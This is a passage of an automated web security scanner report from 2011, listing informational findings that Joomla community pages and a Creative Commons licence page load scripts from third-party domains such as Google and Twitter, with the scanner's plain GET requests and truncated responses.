Date: Mon, 24 Jan 2011 02:23:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.30. http://community.joomla.org/events/joomla-days/975-joomladay-charter.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/events/joomla-days/975-joomladay-charter.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/joomla-days/975-joomladay-charter.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.31. http://community.joomla.org/featured-articles.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/featured-articles.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.32. http://community.joomla.org/featured-articles/1070-vulnerability-list-update.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/featured-articles/1070-vulnerability-list-update.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles/1070-vulnerability-list-update.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.33. http://community.joomla.org/featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.34. http://community.joomla.org/featured-articles/did-you-know.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/featured-articles/did-you-know.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles/did-you-know.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.35. http://community.joomla.org/gsoc2009.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/gsoc2009.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /gsoc2009.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:45 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.36. http://community.joomla.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /index.php HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.37. http://community.joomla.org/login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/login.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.38. http://community.joomla.org/showcase/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.39. http://community.joomla.org/showcase/how-to-submit-a-site.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/how-to-submit-a-site.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.40. http://community.joomla.org/showcase/sites-of-the-month.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites-of-the-month.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.41. http://community.joomla.org/showcase/sites/advsearch.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/advsearch.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.42. http://community.joomla.org/showcase/sites/new.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/new.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.43. http://community.joomla.org/translations.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/translations.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /translations.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 129015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.44. http://community.joomla.org/translations/translation-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/translations/translation-policy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /translations/translation-policy.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:08 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.45. http://community.joomla.org/user-groups.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/user-groups.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAu65O6y8FNQts5goRgAnF6BSnLbr3UYegK-u9ARFPJ9DyegcycxTHXi8ahkaUyHOCeTi45uvT72p79Q&hl=en
http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 205369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAu65O6y8FNQts5goRgAnF6BSnLbr3UYegK-u9ARFPJ9DyegcycxTHXi8ahkaUyHOCeTi45uvT72p79Q&hl=en"></script>
...[SNIP]...

21.46. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://comunidadjoomla.org
Path:	/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAAwJi6pmtOU9KoRE89ky8j4hT2g3acxeQVlyXMf9OT0uIaiOxxMBRzQeDgzz_B6P_bTCgeZqde47Zzcw

Request

Response

21.47. http://creativecommons.org/licenses/by/3.0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creativecommons.org
Path:	/licenses/by/3.0/

Issue detail

The response dynamically includes the following scripts from other domains:

http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js
http://yui.yahooapis.com/2.6.0/build/container/container-min.js
http://yui.yahooapis.com/2.6.0/build/json/json-min.js
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /licenses/by/3.0/ HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 18365
Date: Mon, 24 Jan 2011 15:01:57 GMT
X-Varnish: 1761206209 1761206044
Age: 1
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
